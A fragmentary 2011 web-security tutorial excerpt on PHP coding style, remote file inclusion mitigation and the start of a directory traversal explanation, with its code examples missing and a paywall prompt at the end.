Web Application Security
By: Darkvengance Date: November 25, 2011
Even the most basic of all application security, whether it be web, desktop, server or cloud based, starts with good coding practices. The definition of “good” coding practices varies from programmer to programmer however, they all revolve around two primary concepts: efficiency and “looks”. The main goal here is to learn the
very basics, however as everyone has their own way of doing things, you should find what works best for YOU and stick with it. First we'll start with looks. You may be thinking to yourself “who cares how my code looks?”, well, you should! If you code looks good and is well commented then you, as well as anyone you ask for assistance, will be able to easily scan through the code and quickly pin-point any errors in it. Let's look at an example. Quickly review both of the codes below and identify the error (you should not spend more then 10 seconds on each).
Did you notice the error? Both examples were the exact same code, and had the exact same error in them (missing a period after the $key variable in the foreach loop); however, as you may have noticed example two was a lot easier to read, thus making it that much easier to identify errors. The most common method is to indent blocks of code that are already within blocks, this especially proves true with anything that uses curly brackets (ex. Functions, if statements, while statements, etc.). Indenting is the one thing that nearly all programmers, regardless of what language they are using, agree on. Some languages (such as python) even require indenting code. As stated earlier, all programmers have their own way of doing things, however, the most common method is simply one indent per level, with the exception of level one. When the word “level” is mentioned, it means every block of code that is within another block, for simplicity's sake, the opening and closing PHP tags denote the start and end of level one and every time you encounter an opening curly bracket a new level begins and a closing curly bracket denotes the end of a level. Take the following code for example:
The above script will eliminate the risk of RFI by limiting the input to only two colors, although it is still not wise to trust user input for functions such as include or require. Directory Transversal
Directory Transversal was one of the first web site attacks, and still remains fairly popular among hackers today. Directory transversal is an attack which involves “working backwards” through...
Please join StudyMode to read the full document